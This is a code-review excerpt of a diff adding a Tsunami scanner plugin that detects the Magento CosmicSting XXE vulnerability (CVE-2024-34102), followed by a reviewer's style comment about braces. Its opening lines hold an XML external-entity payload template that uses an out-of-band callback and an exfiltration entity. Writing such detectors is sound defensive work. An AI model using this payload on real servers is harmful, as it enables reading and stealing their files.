doyensec/detectors/magento_cosmicsting_xxe/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202434102/MagentoCosmicStingXxe.java

```diff
@@ -0,0 +1,446 @@
+          + "    <!ELEMENT r ANY >\n"
+          + "    <!ENTITY % oob \"{OOB_CALLBACK}\">\n"
+          + "    <!ENTITY % sp SYSTEM \"{DTD_FILE}\">\n"
+          + "    %sp;\n"
+          + "    %param1;\n"
+          + "]>\n"
+          + "<r>&exfil;</r>";
+
+  @VisibleForTesting
+  static final String VULNERABLE_ENDPOINT_PATH =
+      "rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods";
+
+  @VisibleForTesting
+  static final String CURRENCY_ENDPOINT_PATH = "rest/default/V1/directory/currency";
+
+  @VisibleForTesting static final String VERSION_ENDPOINT_PATH = "magento_version";
+
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+  private final Clock utcClock;
+  private final HttpClient httpClient;
+  private final PayloadGenerator payloadGenerator;
+  private final int oobSleepDuration;
+  private boolean responseMatchingOnly = false;
+  private String detectedMagentoVersion = null;
+
+  @Inject
+  MagentoCosmicStingXxe(
+      @UtcClock Clock utcClock,
+      HttpClient httpClient,
+      PayloadGenerator payloadGenerator,
+      @OobSleepDuration int oobSleepDuration) {
+    this.utcClock = checkNotNull(utcClock);
+    this.httpClient = checkNotNull(httpClient);
+    this.payloadGenerator = checkNotNull(payloadGenerator);
+    this.oobSleepDuration = oobSleepDuration;
+  }
+
+  // This is the main entry point of VulnDetector.
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    logger.atInfo().log("MagentoCosmicStingXxe starts detecting.");
+
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(NetworkServiceUtils::isWebService)
+                .filter(this::isMagento)
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  /*
+    Check presence of endpoint with always anonymous access: /rest/default/V1/directory/currency
+    From: https://developer.adobe.com/commerce/webapi/rest/use-rest/anonymous-api-security/
+
+    Typical response:
+    HTTP/2 200 OK
+    {
+      "base_currency_code": "USD",
+      "base_currency_symbol": "$",
+      ...
+    }
+  */
+  private boolean isMagento(NetworkService networkService) {
+    String targetUri =
+        NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + CURRENCY_ENDPOINT_PATH;
+
+    HttpRequest req =
+        HttpRequest.get(targetUri)
+            .setHeaders(HttpHeaders.builder().addHeader("Accept", "application/json").build())
+            .build();
+
+    HttpResponse response;
+    try {
+      response = this.httpClient.send(req, networkService);
+    } catch (IOException e) {
+      return false;
+    }
+
+    // Check status code 200
+    if (response.status() != HttpStatus.OK) return false;
```

Comment:
https://google.github.io/styleguide/javaguide.html#s4.1.1-braces-always-used

Google java style guide always prefer using braces even for a single statement.